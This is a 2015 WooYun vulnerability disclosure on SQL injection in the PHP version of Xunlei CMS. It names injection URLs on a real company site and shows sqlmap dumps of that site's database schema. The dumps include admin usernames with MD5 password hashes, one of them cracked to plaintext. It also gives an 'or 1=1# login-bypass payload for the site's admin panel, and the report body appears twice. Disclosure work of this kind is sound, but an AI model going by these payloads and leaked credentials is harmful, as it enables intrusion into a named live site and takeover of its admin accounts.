当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103460

漏洞标题:迅雷CMS#PHP版 两处Get注入+Post注入

相关厂商:迅雷CMS

漏洞作者: 浅蓝

提交时间:2015-03-31 15:27

修复时间:2015-05-15 15:28

公开时间:2015-05-15 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题

详细说明:

迅雷cms精选案例
http://ycxl.net/index.php?m=Article&a=index&id=22
http://www.ycgjgs.com/ 这是个php版的
http://www.ycgjgs.com//news.php?id=475 注入点1
http://www.ycgjgs.com//qynews.php?type=8 注入点2

Database: gongjiaogongsi
Table: 285765338_message
[8 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| data | text |
| huifu | text |
| id | int(11) |
| name | text |
| ok | int(11) |
| tel | text |
| text | text |
| title | text |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_news
[9 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| data | text |
| id | int(11) |
| ly | text |
| text | text |
| title | text |
| titlepic | varchar(100) |
| type | text |
| voidurl | varchar(255) |
| zz | text |
+----------+--------------+
Database: gongjiaogongsi
Table: 285765338_dy
[5 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| id | int(11) |
| text | text |
| title | text |
| type | text |
| typp | text |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_zp
[13 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| gwyq | text |
| id | int(11) |
| jzrq | text |
| lxfs | text |
| nl | text |
| rs | text |
| xb | text |
| xl | text |
| yx | text |
| zpzw | text |
| zwmc | text |
| zygl | text |
| zyyq | text |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_admin
[3 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| id | int(11) |
| password | text |
| username | text |
+----------+---------+
Database: gongjiaogongsi
Table: 285765338_info
[6 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| foot | text |
| id | int(11) |
| query1 | text |
| query2 | text |
| title | text |
| url | text |
+--------+---------+


Database: gongjiaogongsi
Table: 285765338_admin
[3 entries]
+----------+--------------------------------------------+
| username | password |
+----------+--------------------------------------------+
| admin | 3578ff997a31c61033122d17322858bd |
| admin1 | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
| admin2 | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
+----------+--------------------------------------------+
[15:27:44] [WARNING] table 'gongjiaogongsi.`285765338_admin`' dumped to CSV file
'C:\Documents and Settings\Administrator\.sqlmap\output\www.ycgjgs.com\dump\gon
gjiaogongsi\285765338_admin-62da74f4.csv'
[15:27:44] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.ycgjgs.com'
[*] shutting down at 15:27:44


X}FJ_E5)M15$O@32J1R@]MR.png


# 后台登陆处参数未过滤可绕过登录
http://www.ycgjgs.com//admincm/ 后台

QLF0CUH$995@11}_BVLS$86.png


账号'or 1=1# 密码随意

H@9N1JSPH{R`012N6CVUD$S.png

漏洞证明:

迅雷cms精选案例
http://ycxl.net/index.php?m=Article&a=index&id=22
http://www.ycgjgs.com/ 这是个php版的
http://www.ycgjgs.com//news.php?id=475 注入点1
http://www.ycgjgs.com//qynews.php?type=8 注入点2

Database: gongjiaogongsi
Table: 285765338_message
[8 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| data | text |
| huifu | text |
| id | int(11) |
| name | text |
| ok | int(11) |
| tel | text |
| text | text |
| title | text |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_news
[9 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| data | text |
| id | int(11) |
| ly | text |
| text | text |
| title | text |
| titlepic | varchar(100) |
| type | text |
| voidurl | varchar(255) |
| zz | text |
+----------+--------------+
Database: gongjiaogongsi
Table: 285765338_dy
[5 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| id | int(11) |
| text | text |
| title | text |
| type | text |
| typp | text |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_zp
[13 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| gwyq | text |
| id | int(11) |
| jzrq | text |
| lxfs | text |
| nl | text |
| rs | text |
| xb | text |
| xl | text |
| yx | text |
| zpzw | text |
| zwmc | text |
| zygl | text |
| zyyq | text |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_admin
[3 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| id | int(11) |
| password | text |
| username | text |
+----------+---------+
Database: gongjiaogongsi
Table: 285765338_info
[6 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| foot | text |
| id | int(11) |
| query1 | text |
| query2 | text |
| title | text |
| url | text |
+--------+---------+


Database: gongjiaogongsi
Table: 285765338_admin
[3 entries]
+----------+--------------------------------------------+
| username | password |
+----------+--------------------------------------------+
| admin | 3578ff997a31c61033122d17322858bd |
| admin1 | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
| admin2 | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
+----------+--------------------------------------------+
[15:27:44] [WARNING] table 'gongjiaogongsi.`285765338_admin`' dumped to CSV file
'C:\Documents and Settings\Administrator\.sqlmap\output\www.ycgjgs.com\dump\gon
gjiaogongsi\285765338_admin-62da74f4.csv'
[15:27:44] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.ycgjgs.com'
[*] shutting down at 15:27:44


X}FJ_E5)M15$O@32J1R@]MR.png


# 后台登陆处参数未过滤可绕过登录
http://www.ycgjgs.com//admincm/ 后台

QLF0CUH$995@11}_BVLS$86.png


账号'or 1=1# 密码随意

H@9N1JSPH{R`012N6CVUD$S.png

修复方案:

转义

版权声明:转载请注明来源 浅蓝@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论